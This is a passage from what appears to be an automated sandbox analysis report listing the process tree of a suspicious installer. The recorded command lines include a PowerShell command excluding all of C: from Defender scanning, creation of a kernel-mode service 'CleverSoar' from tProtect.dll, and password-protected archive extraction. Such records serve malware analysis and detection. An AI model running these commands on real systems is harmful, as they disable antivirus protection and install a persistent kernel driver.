                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:22:52:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff6e3d50000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:22:52:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:22:52:56
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x420000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:22:52:57
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x450000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x7c0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x7c0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:13
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff717f30000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:21
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7403e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
